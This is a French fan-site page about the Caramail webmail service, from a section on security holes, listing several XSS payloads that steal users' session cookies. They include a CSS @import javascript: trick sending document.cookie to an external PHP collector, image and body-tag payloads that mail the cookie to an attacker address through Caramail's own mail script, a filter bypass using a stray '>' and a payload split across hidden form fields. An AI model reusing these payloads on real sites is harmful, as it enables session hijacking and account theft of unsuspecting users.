connecté(e)s @ Smail.fr
0 jours depuis le chgmt de Chat
inscrits aux Forums
249 messages sur le Livre d'or

Mar 16 Mar 10
- Accueil -
 
 
 :: PlanetCara
 :: Caramail
 :: Salon
 :: Clans

 :: News
 :: Screenshots
 :: Failles
 :: Documentation
 :: Astuces
 :: Smileys
 :: Sources
 :: Outils
 :: Archives

 :: Forums
 :: Livre d'or
 :: Sondages

 :: Aide
 :: Liens

 :: K-raMail


Note:Certains scripts sont très basiques et leur évolution a apporté de nouvelles techniques. Les premiers scripts envoyaient, la plupart du temps, le cookie par e-mail, est venu ensuite la récupération par site, bien plus discrète..
Etc..

<link rel="StyleSheet" type="text/css" href="http://www.multimania.com/login/code.css">
> balise de feuille de style CSS récupérée sur un site complice

code.css :
@import url(javascript:lol = new Image());
@import url(javascript:lol.src = "http://www.multimania.com/login/recup.php?data="+document.cookie);
> script CSS lançant du javascript et envoyant le cookie vers un script php

recup.php:
> script enregistrant/mailant la variable "data"

<img bx=">" src="javascript:lol = new Image(); lol.src='http://www30.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=n00b@null&SUBJECT=:)&BODY='+ window.document.cookie +'&TARGETACTION=NONE';" width=0>
script qui joue sur le fait que le filtre considérait la balise <img fermée, lorsque le signe > appraissait (tout ce qui suit n'était pas considéré)

<img src="javascript:window.location.href='http://www21.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=n00b@null&SUBJECT=:)&BODY=' + window.document.cookie + '&TARGETACTION=NONE';" width=0>
comme le premier script, simplement dissimulé dans une image : lorsque le navigateur va chercher l'adresse, le script s'execute

<body onunload="relpubloc()" onbeforeunload="eval(lol.url1.value+lol.url2.value);">
<form name=lol>
<input type=hidden name="url1" value=" lol = new Image(); lol.src='http://www30.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MA">
<input type=hidden name="url2" value="ILTO=n00b@null&SUBJECT=:-)&BODY='+ window.document.cookie +'&TARGETACTION=NONE';">
</form>

<body ONLOAD="window.location='http://www30.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=n00b@null&SUBJECT=:-)&BODY=' + window.document.cookie + '&TARGETACTION=NONE';">
un des premiers script: la balise demande, au chargement de la page, de changer d'adresse et de se diriger vers le script d'envoi du e-mail. les données sont postées, pour que le e-mail soit envoyé à l'adresse définie et le cookie est inséré, dans le corps du message

 :: P-E_Jacoupy
 :: Stats WebMail
 :: Fin du Chat
 :: Linternaute
 :: Yahoo-Lycos
 :: Orianne-MSN
 :: Alex_Dreyfus
 :: TF1-Cara
 :: Arnaud-JCVD
 :: Bilan 01-02
 :: CaraFou

 :: FAQ
 :: Présentation
 :: Downloads
 :: Auteurs

 :: FAQ
 :: Historique
 :: Récupération

 :: Administrateurs
 :: Personnalités
 :: Modérateurs
 :: Utilisateurs
 :: Lamers

meilleure note: 5
 

- Copyright © 2001-2010 PlanetCara -
- Création RootzMail.net - Tous droits réservés -
Problème d'affichage ?